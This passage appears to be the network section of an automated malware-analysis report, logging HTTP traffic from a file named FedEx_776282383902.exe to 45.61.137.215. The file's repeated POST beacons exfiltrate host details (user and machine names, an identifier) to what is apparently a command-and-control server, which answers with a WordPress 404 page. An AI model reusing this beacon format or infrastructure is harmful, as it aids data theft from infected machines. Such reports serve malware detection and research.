72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:46.270869970 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:46.275849104 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:46.275870085 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:46.285473108 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:02:46.290400982 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:02:46.290416956 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:02:46.300231934 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 22, 2024 22:02:46.303313971 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 22, 2024 22:02:46.303330898 CEST	556	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49732	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:46.431591034 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:46.480099916 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:49.352571011 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:46 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:49.353880882 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 22, 2024 22:02:49.356919050 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 22, 2024 22:02:49.359966993 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 22, 2024 22:02:49.359985113 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 22, 2024 22:02:49.359999895 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 22, 2024 22:02:49.373689890 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:49.373716116 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:02:49.373730898 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:02:49.373748064 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49733	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:49.622448921 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:49.674948931 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:02:52.551318884 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:02:50 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:02:52.553193092 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:02:52.556549072 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:02:52.556566000 CEST	672	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:02:52.560895920 CEST	1236	IN	Data Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
May 22, 2024 22:02:52.560936928 CEST	224	IN	Data Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
May 22, 2024 22:02:52.562407970 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:02:52.562426090 CEST	224	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
May 22, 2024 22:02:52.562436104 CEST	1236	IN	Data Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
May 22, 2024 22:02:52.567425013 CEST	1236	IN	Data Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49734	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:02:52.721786976 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:02:52.776209116 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
